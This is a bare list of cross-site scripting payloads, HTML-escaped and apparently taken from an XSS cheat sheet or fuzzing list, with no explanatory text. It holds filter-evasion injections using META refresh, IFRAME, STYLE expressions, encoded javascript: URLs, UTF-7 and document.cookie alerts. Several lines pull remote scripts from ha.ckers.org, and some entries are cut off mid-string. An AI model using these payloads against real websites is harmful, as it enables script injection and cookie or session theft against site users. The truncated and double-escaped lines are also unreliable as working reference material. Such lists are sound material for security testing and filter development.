&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
